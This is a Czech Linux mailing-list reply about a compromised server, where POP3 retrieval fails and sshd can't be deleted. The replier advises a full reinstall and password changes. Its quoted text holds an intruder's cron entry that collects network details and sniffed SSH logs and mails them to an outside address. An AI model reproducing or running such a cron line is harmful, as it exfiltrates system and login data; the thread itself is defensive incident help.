ipop3d servicing

Zdenek Pytela letty na mrakoplas.phil.muni.cz
Čtvrtek Leden 3 12:23:04 CET 2002 

Lukas Kvitek píše:
> Dobry den.
> 
>     Nemam moc zkusenosti a v archivu jsem nasledujici problem nenasel.
> 1)
> Sendmail funguje podle me spravne. Odesila, prijima postu, ale kdyz chci
> pres pop3 vybrat postu z woken, tak to nehodi zadnou chybovou hlasku, ale
> zaroven se nestahne zadna nova posta, i kdyz maily ve var/spool/mail/xx
> jsou. Pine je vsak ukaze. Pri kazdem dotazu z Outluku a pod. se do maillogu
> prida pouze
> 
> Dec 24 23:35:07 "server name" ipop3d[31536]: Servicing "user @ ip
> adresa"
> 
> 
> Muze byt prvotni pricinou treba toto ?
	Toto není příčina, ale příznak. Kdysi vyšel na underground.cz pěkný
článek "you've been hacked", přečtěte si ho nebo jakýkoliv jiný, co dělat
(ve stručnosti: odpojit od sítě, přeinstalovat úplně všechno, změnit všechna
úplně hesla). Zřejmě neudržujete svoji distribuci v aktuálním stavu nebo
jste při tom byl moc pomalý - viz též jiný dopis tento týden.

> ve var/spool/cron jsem nasel soubor "operator"  ..? s nasledujicim
> textem
> 
> # DO NOT EDIT THIS FILE - edit the master and reinstall.
> # (crontab-entry installed on Mon Dec 24 23:25:57 2001)
> # (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp
> $)
> 0 0 1 * * /sbin/ifconfig |grep inet >/tmp/.log 2>/dev/null;
> /bin/hostname -f >>/tmp/.log 2>/dev/null; /usr/local/games/banner
> /usr/local/games/tcp.log >>/tmp/.log 2>/dev/null; cat
> /usr/local/games/ssh_outgoing >>/tmp/.log 2>/dev/null; cat
> /usr/local/games/sshd_ingoing >>/tmp/.log 2>/dev/null; cat
> /tmp/.log|mail -s 'tcp.log' inkubusroot na yahoo.com >/dev/null 2>&1; rm -f
> /tmp/.log >/dev/null 2>&1
	Tady to máte pěkně popsané.

> 2) Ve stejnou dobu prestalo fungovat ssh - lepe receno datum vytvoreni
> /etc/rc.d/init.d/sshd ( a bohuze i syslog ) je stejny s datumem, kdy zacaly problemy - 24 23:25.
> Sshd jsem stopnul, v bezicich procesech nebyl, a tak
> jsem ho chtel reinstalovat. To se me nepodarilo, jelikoz me system nepovolil prave sshd ani natvrdo smazat (nelze odvazat?).
Asi bude mít nastaven immutable bit, zkuste

$ lsattr `which sshd`

> Nejsem si jist, zda-li vse ma souvislost s tim, ze nejde provest
> pop3, stale doufam ze to je nejaka moje chyba, ale nevim jak ji odstranit :-(. Mozna najivne doufam, ze si o Vanocich lidi rozbaluji darky a nezkousej se nabouravat na jine servery.
	To je hezká představa.

-- 

--Zdeněk Pytela, <letty na mrakoplas.phil.muni.cz>

Další informace o konferenci Linux